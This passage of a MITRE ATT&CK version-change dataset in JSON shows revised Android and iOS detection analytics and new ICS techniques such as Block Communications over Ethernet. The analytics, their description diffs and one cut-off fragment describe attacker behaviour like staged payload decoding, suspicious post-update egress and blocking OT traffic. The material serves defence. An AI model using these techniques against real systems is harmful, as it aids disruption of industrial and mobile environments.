class=\"diff_sub\">r&nbsp;encrypted&nbsp;form&nbsp;by&nbsp;detecting&nbsp;the&nbsp;code&nbsp;at&nbsp;execution&nbsp;time&nbsp;(af</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tainer/tmp,&nbsp;performing&nbsp;decode/decompress/reassembly,&nbsp;and&nbsp;the</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ter&nbsp;it&nbsp;is&nbsp;deobfuscated&nbsp;or&nbsp;decrypted).&nbsp;Some&nbsp;application&nbsp;vetti</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">n&nbsp;executing/loaded&nbsp;as&nbsp;Mach-O&nbsp;or&nbsp;bundle&nbsp;(dlopen)&nbsp;or&nbsp;leveragin</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">ng&nbsp;techniques&nbsp;apply&nbsp;reputation&nbsp;analysis&nbsp;of&nbsp;the&nbsp;application&nbsp;d</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">g&nbsp;JIT/RWX&nbsp;pages&nbsp;to&nbsp;run&nbsp;the&nbsp;decoded&nbsp;payload.&nbsp;Sequence:&nbsp;opaque</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">eveloper&nbsp;and&nbsp;can&nbsp;alert&nbsp;to&nbsp;potentially&nbsp;suspicious&nbsp;application</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;download&nbsp;or&nbsp;IPC&nbsp;\u2192&nbsp;high-entropy&nbsp;writes/split-file&nbsp;bursts&nbsp;\u2192&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">s&nbsp;without&nbsp;actual&nbsp;examination&nbsp;of&nbsp;application&nbsp;code.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ecode/unarchive&nbsp;\u2192&nbsp;new&nbsp;Mach-O/bundle&nbsp;in&nbsp;tmp&nbsp;\u2192&nbsp;dlopen/posix_sp</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">awn&nbsp;or&nbsp;RWX&nbsp;region&nbsp;activity.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--b95bc556-c98c-459e-9327-49830ce9c77c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-17 15:44:07.335000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0721#AN1853",
                            "external_id": "AN1853"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1853",
                    "description": "The defender correlates the arrival, installation, or update of a trusted or expected application with a subsequent deviation in package trust characteristics, permission posture, protected-resource use, framework behavior, or network communication that is inconsistent with the known-good role of that app. The strongest Android evidence is a managed or trusted package whose first-run or post-update behavior introduces unexpected special access, sensitive sensor use, unusual background execution, privileged framework interaction, or outbound communication to destinations outside the app's baseline shortly after installation or update.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "android:MDMLog",
                            "channel": "Managed or trusted app is newly installed or updated and presents changed package identity, signing relationship, version lineage, installer source, or permission posture inconsistent with approved baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app begins background execution, persistent service activity, overlay-like behavior, or lock-state activity inconsistent with its historical baseline or expected first-run sequence"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between install/update and subsequent runtime/network effects."
                        },
                        {
                            "field": "AllowedAppList",
                            "description": "Approved managed or trusted applications vary by organization and device group."
                        },
                        {
                            "field": "AllowedInstallerSources",
                            "description": "Permitted installer source or app delivery mechanism differs by fleet and policy."
                        },
                        {
                            "field": "AllowedSigningBaseline",
                            "description": "Expected signing lineage, certificate relationship, or integrity metadata vary by package."
                        },
                        {
                            "field": "ForegroundStateRequired",
                            "description": "Some protected-resource use is legitimate only when an app is foregrounded."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close behavior must be to user interaction to be considered expected."
                        },
                        {
                            "field": "AllowedDestinations",
                            "description": "Expected app destinations, CDNs, APIs, and service providers vary by app and tenant."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Android"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between install/update and subsequent runtime/network effects.\"}, {\"field\": \"AllowedAppList\", \"description\": \"Approved managed or trusted applications vary by organization and device group.\"}, {\"field\": \"AllowedInstallerSources\", \"description\": \"Permitted installer source or app delivery mechanism differs by fleet and policy.\"}, {\"field\": \"AllowedSigningBaseline\", \"description\": \"Expected signing lineage, certificate relationship, or integrity metadata vary by package.\"}, {\"field\": \"ForegroundStateRequired\", \"description\": \"Some protected-resource use is legitimate only when an app is foregrounded.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close behavior must be to user interaction to be considered expected.\"}, {\"field\": \"AllowedDestinations\", \"description\": \"Expected app destinations, CDNs, APIs, and service providers vary by app and tenant.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-17 15:44:07.335000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"The defender correlates the arrival, installation, or update of a trusted or expected application with a subsequent deviation in package trust characteristics, permission posture, protected-resource use, framework behavior, or network communication that is inconsistent with the known-good role of that app. The strongest Android evidence is a managed or trusted package whose first-run or post-update behavior introduces unexpected special access, sensitive sensor use, unusual background execution, privileged framework interaction, or outbound communication to destinations outside the app's baseline shortly after installation or update.\", \"old_value\": \"Application vetting services can detect malicious code in applications.\\nSystem partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can detect malicious code in applications.\\n-System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.\\n+The defender correlates the arrival, installation, or update of a trusted or expected application with a subsequent deviation in package trust characteristics, permission posture, protected-resource use, framework behavior, or network communication that is inconsistent with the known-good role of that app. The strongest Android evidence is a managed or trusted package whose first-run or post-update behavior introduces unexpected special access, sensitive sensor use, unusual background execution, privileged framework interaction, or outbound communication to destinations outside the app's baseline shortly after installation or update.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"android:MDMLog\", \"channel\": \"Managed or trusted app is newly installed or updated and presents changed package identity, signing relationship, version lineage, installer source, or permission posture inconsistent with approved baseline\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app begins background execution, persistent service activity, overlay-like behavior, or lock-state activity inconsistent with its historical baseline or expected first-run sequence\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app invokes Android framework paths or special access patterns inconsistent with its role, including accessibility-like behavior, overlay behavior, package visibility expansion, protected settings access, device policy interaction, or unusual IPC/provider access\"}, \"root['x_mitre_log_source_references'][3]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to194__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to194__0\"><a href=\"#difflib_chg_to194__top\">t</a></td><td class=\"diff_header\" id=\"from194_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;malicious&nbsp;code&nbsp;in&nbsp;ap</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to194__top\">t</a></td><td class=\"diff_header\" id=\"to194_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">The&nbsp;defender&nbsp;correlates&nbsp;the&nbsp;arrival,&nbsp;installation,&nbsp;or&nbsp;update</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">plications.&nbsp;System&nbsp;partition&nbsp;integrity&nbsp;checking&nbsp;mechanisms&nbsp;c</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;of&nbsp;a&nbsp;trusted&nbsp;or&nbsp;expected&nbsp;application&nbsp;with&nbsp;a&nbsp;subsequent&nbsp;devi</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">an&nbsp;detect&nbsp;unauthorized&nbsp;or&nbsp;malicious&nbsp;code&nbsp;contained&nbsp;in&nbsp;the&nbsp;sy</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ation&nbsp;in&nbsp;package&nbsp;trust&nbsp;characteristics,&nbsp;permission&nbsp;posture,&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">stem&nbsp;partition.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">protected-resource&nbsp;use,&nbsp;framework&nbsp;behavior,&nbsp;or&nbsp;network&nbsp;commu</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nication&nbsp;that&nbsp;is&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;known-good&nbsp;role&nbsp;of&nbsp;th</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">at&nbsp;app.&nbsp;The&nbsp;strongest&nbsp;Android&nbsp;evidence&nbsp;is&nbsp;a&nbsp;managed&nbsp;or&nbsp;trust</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;package&nbsp;whose&nbsp;first-run&nbsp;or&nbsp;post-update&nbsp;behavior&nbsp;introduce</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">s&nbsp;unexpected&nbsp;special&nbsp;access,&nbsp;sensitive&nbsp;sensor&nbsp;use,&nbsp;unusual&nbsp;b</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ackground&nbsp;execution,&nbsp;privileged&nbsp;framework&nbsp;interaction,&nbsp;or&nbsp;ou</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">tbound&nbsp;communication&nbsp;to&nbsp;destinations&nbsp;outside&nbsp;the&nbsp;app's&nbsp;basel</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ine&nbsp;shortly&nbsp;after&nbsp;installation&nbsp;or&nbsp;update.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--c8eb9196-3134-4954-9331-838556db9aa1",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-03-17 17:55:46.302000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0721#AN1854",
                            "external_id": "AN1854"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1854",
                    "description": "Anchor on supervised managed-app install/update or version drift, then correlate with unexpected background activity, managed-app state changes, or egress inconsistent with the app's historical and policy baseline.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "mobile-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43",
                            "name": "iOS:MDMLog",
                            "channel": "Supervised managed app is newly installed or updated and presents unexpected version transition, inventory drift, managed-state change, or app attribute mismatch against approved procurement and release baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9",
                            "name": "MobileEDR:telemetry",
                            "channel": "Recently installed or updated managed app begins background activity, persistent refresh, or lock-state-adjacent activity inconsistent with expected first-run behavior, user interaction timing, or historical baseline"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e",
                            "name": "iOS:unifiedlog",
                            "channel": "Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "TimeWindow",
                            "description": "Correlation window between app install/update and subsequent lifecycle or network anomalies."
                        },
                        {
                            "field": "SupervisedRequired",
                            "description": "Strongest app inventory and managed state analytics depend on supervised iOS devices."
                        },
                        {
                            "field": "AllowedManagedApps",
                            "description": "Approved managed app set varies by organization, business unit, and device profile."
                        },
                        {
                            "field": "ExpectedVersionTransitionPolicy",
                            "description": "Allowed upgrade paths, release rings, and phased rollout patterns vary by environment."
                        },
                        {
                            "field": "AllowedDestinations",
                            "description": "Expected app destinations, enterprise backends, Apple services, and CDNs differ by app."
                        },
                        {
                            "field": "BackgroundRefreshBaseline",
                            "description": "Legitimate background activity differs by app category and policy."
                        },
                        {
                            "field": "RecentUserInteractionWindow",
                            "description": "Defines how close runtime/network activity must be to user action to be considered expected."
                        },
                        {
                            "field": "UplinkBytesThreshold",
                            "description": "Threshold for suspicious post-update outbound transfer volume."
                        }
                    ],
                    "x_mitre_platforms": [
                        "iOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_mutable_elements']\": [{\"field\": \"TimeWindow\", \"description\": \"Correlation window between app install/update and subsequent lifecycle or network anomalies.\"}, {\"field\": \"SupervisedRequired\", \"description\": \"Strongest app inventory and managed state analytics depend on supervised iOS devices.\"}, {\"field\": \"AllowedManagedApps\", \"description\": \"Approved managed app set varies by organization, business unit, and device profile.\"}, {\"field\": \"ExpectedVersionTransitionPolicy\", \"description\": \"Allowed upgrade paths, release rings, and phased rollout patterns vary by environment.\"}, {\"field\": \"AllowedDestinations\", \"description\": \"Expected app destinations, enterprise backends, Apple services, and CDNs differ by app.\"}, {\"field\": \"BackgroundRefreshBaseline\", \"description\": \"Legitimate background activity differs by app category and policy.\"}, {\"field\": \"RecentUserInteractionWindow\", \"description\": \"Defines how close runtime/network activity must be to user action to be considered expected.\"}, {\"field\": \"UplinkBytesThreshold\", \"description\": \"Threshold for suspicious post-update outbound transfer volume.\"}]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-03-17 17:55:46.302000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Anchor on supervised managed-app install/update or version drift, then correlate with unexpected background activity, managed-app state changes, or egress inconsistent with the app's historical and policy baseline.\", \"old_value\": \"Application vetting services can detect malicious code in applications.\\nSystem partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.\", \"diff\": \"--- \\n+++ \\n@@ -1,2 +1 @@\\n-Application vetting services can detect malicious code in applications.\\n-System partition integrity checking mechanisms can detect unauthorized or malicious code contained in the system partition.\\n+Anchor on supervised managed-app install/update or version drift, then correlate with unexpected background activity, managed-app state changes, or egress inconsistent with the app's historical and policy baseline.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}, \"root['x_mitre_log_source_references'][0]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43\", \"name\": \"iOS:MDMLog\", \"channel\": \"Supervised managed app is newly installed or updated and presents unexpected version transition, inventory drift, managed-state change, or app attribute mismatch against approved procurement and release baseline\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962\", \"name\": \"Application Vetting\", \"channel\": \"None\"}}, \"root['x_mitre_log_source_references'][1]\": {\"new_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--55c669d9-b42a-4cf6-a38a-07161b228ce9\", \"name\": \"MobileEDR:telemetry\", \"channel\": \"Recently installed or updated managed app begins background activity, persistent refresh, or lock-state-adjacent activity inconsistent with expected first-run behavior, user interaction timing, or historical baseline\"}, \"old_value\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--85a533a4-5fa4-4dba-b45d-f0717bedd6e6\", \"name\": \"Sensor Health\", \"channel\": \"None\"}}}, \"iterable_item_added\": {\"root['x_mitre_log_source_references'][2]\": {\"x_mitre_data_component_ref\": \"x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e\", \"name\": \"iOS:unifiedlog\", \"channel\": \"Supplemental managed app or system subsystem anomalies near install/update, launch services, extension handling, app activation, or background execution temporally adjacent to suspicious network or lifecycle behavior\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to113__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to113__0\"><a href=\"#difflib_chg_to113__top\">t</a></td><td class=\"diff_header\" id=\"from113_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Application&nbsp;vetting&nbsp;services&nbsp;can&nbsp;detect&nbsp;malicious&nbsp;code&nbsp;in&nbsp;ap</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to113__top\">t</a></td><td class=\"diff_header\" id=\"to113_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Anchor&nbsp;on&nbsp;supervised&nbsp;managed-app&nbsp;install/update&nbsp;or&nbsp;version&nbsp;d</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">plications.&nbsp;System&nbsp;partition&nbsp;integrity&nbsp;checking&nbsp;mechanisms&nbsp;c</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">rift,&nbsp;then&nbsp;correlate&nbsp;with&nbsp;unexpected&nbsp;background&nbsp;activity,&nbsp;ma</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">an&nbsp;detect&nbsp;unauthorized&nbsp;or&nbsp;malicious&nbsp;code&nbsp;contained&nbsp;in&nbsp;the&nbsp;sy</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">naged-app&nbsp;state&nbsp;changes,&nbsp;or&nbsp;egress&nbsp;inconsistent&nbsp;with&nbsp;the&nbsp;app</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">stem&nbsp;partition.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">'s&nbsp;historical&nbsp;and&nbsp;policy&nbsp;baseline.</span></td></tr>\n        </tbody>\n    </table>"
                }
            ],
            "other_version_changes": [],
            "patches": [],
            "revocations": [],
            "deprecations": [],
            "deletions": []
        }
    },
    "ics-attack": {
        "techniques": {
            "additions": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--fbb67c2d-37c3-49ee-86e3-bf234cc48ca9",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:50:35.776000+00:00",
                    "modified": "2026-04-23 19:52:53.490000+00:00",
                    "name": "Block Communications",
                    "description": "Operational technology communications occur over serial COM, Ethernet, Wi-Fi, cellular (4G/5G), and satellite mediums. Adversaries may block communications to prevent reporting messages and command messages from reaching their intended target devices disrupting processes, operations, and causing cyber-physical impacts.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)  \n\nAdversaries may block communications by either making modifications to software ([System Firmware](https://attack.mitre.org/techniques/T0857), [Module Firmware](https://attack.mitre.org/techniques/T0839), [Hooking](https://attack.mitre.org/techniques/T0874), and [Rootkit](https://attack.mitre.org/techniques/T0851)) and services ([Service Stop](https://attack.mitre.org/techniques/T0881), [Denial of Service](https://attack.mitre.org/techniques/T0814)) on systems and devices or by positioning themselves between systems and devices and intercepting and blocking the communications such as the case with an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1695",
                            "external_id": "T1695"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--6008c1f0-1b68-4614-8f5b-a547436b8855",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:22.891000+00:00",
                    "modified": "2026-04-23 19:57:13.444000+00:00",
                    "name": "Ethernet",
                    "description": "Adversaries may block access to Ethernet communications to prevent instructions or configurations messages from reaching target systems and devices. Ethernet connections allow for communications between IT and OT systems and devices. Blocking Ethernet communications may also block command and reporting messages.(Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)\n\nAn adversary may block Ethernet communications by disabling network interfaces, [Service Stop](https://attack.mitre.org/techniques/T0881), or conducting an [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) attack and dropping the network traffic.\n",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-ics-attack",
                            "phase_name": "inhibit-response-function"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1695/002",
                            "external_id": "T1695.002"
                        },
                        {
                            "source_name": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011",
                            "description": "Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011 A Taxonomy of Cyber Attacks on SCADA Systems Retrieved. 2018/01/12 ",
                            "url": "http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6142258"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "ics-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--55e7e5c1-3760-4451-bae0-e79b29f452c5",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 20:54:22.399000+00:00",
                    "modified": "2026-04-23 19:59:10.079000+00:00",
                    "name": "Serial COM",
